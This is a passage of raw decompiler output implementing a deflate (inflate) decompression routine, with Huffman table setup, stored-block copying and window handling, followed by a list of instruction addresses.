							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                            0x00406d85
                            0x00406d85
                            0x00406d85
                            0x00406d85
                            0x00406d85
                            0x00406d89
                            0x00000000
                            0x00000000
                            0x00406d8f
                            0x00406d8f
                            0x00406d92
                            0x00406d95
                            0x00406d9a
                            0x00406d9c
                            0x00406d9f
                            0x00406da2
                            0x00406da5
                            0x00406da5
                            0x00406da8
                            0x00000000
                            0x00000000
                            0x00406daa
                            0x00406daa
                            0x00406dad
                            0x00406db2
                            0x00406db4
                            0x00406db7
                            0x00406dbd
                            0x00406b1c
                            0x00406b1c
                            0x00406b1f
                            0x00406b25
                            0x00406b2b
                            0x00406b34
                            0x00406b3a
                            0x00406b3d
                            0x00406b44
                            0x00406b49
                            0x00406b4f
                            0x00406b5a
                            0x00406b5a
                            0x00406dc3
                            0x00406dc3
                            0x00406dcd
                            0x00000000
                            0x00000000
                            0x00406dd3
                            0x00406dd3
                            0x00406dd7
                            0x00406dda
                            0x00406dda
                            0x00406dde
                            0x00406de4
                            0x00406de4
                            0x00406de7
                            0x00406dea
                            0x00406df0
                            0x00000000
                            0x00000000
                            0x00406df2
                            0x00406e14
                            0x00406e14
                            0x00406e17
                            0x00000000
                            0x00000000
                            0x00406df4
                            0x00406df8
                            0x00000000
                            0x00000000
                            0x00406dfe
                            0x00406dfe
                            0x00406e01
                            0x00406e04
                            0x00406e09
                            0x00406e0b
                            0x00406e0e
                            0x00406e11
                            0x00406e11
                            0x00406e19
                            0x00406e19
                            0x00406e1f
                            0x00406e22
                            0x00406e25
                            0x00406e25
                            0x00406e2c
                            0x00406e30
                            0x00406e34
                            0x00406e37
                            0x00406e3a
                            0x00406e40
                            0x00406e45
                            0x00000000
                            0x00000000
                            0x00406e47
                            0x00406e5b
                            0x00406e5b
                            0x00406e5f
                            0x00000000
                            0x00000000
                            0x00406e49
                            0x00406e4c
                            0x00406e4c
                            0x00406e53
                            0x00406e58
                            0x00406e58
                            0x00406e58
                            0x00406e61
                            0x00406e61
                            0x00406e64
                            0x00406e72
                            0x00406e78
                            0x00406e7d
                            0x00406e83
                            0x00406e89
                            0x00406e8f
                            0x00406e96
                            0x00406eaa
                            0x00406eaa
                            0x00407479
                            0x00407479
                            0x00407479
                            0x0040747e
                            0x00000000
                            0x00000000
                            0x00406ab6
                            0x00406ab6
                            0x00000000
                            0x004070b1
                            0x004070b1
                            0x004070b5
                            0x004070b8
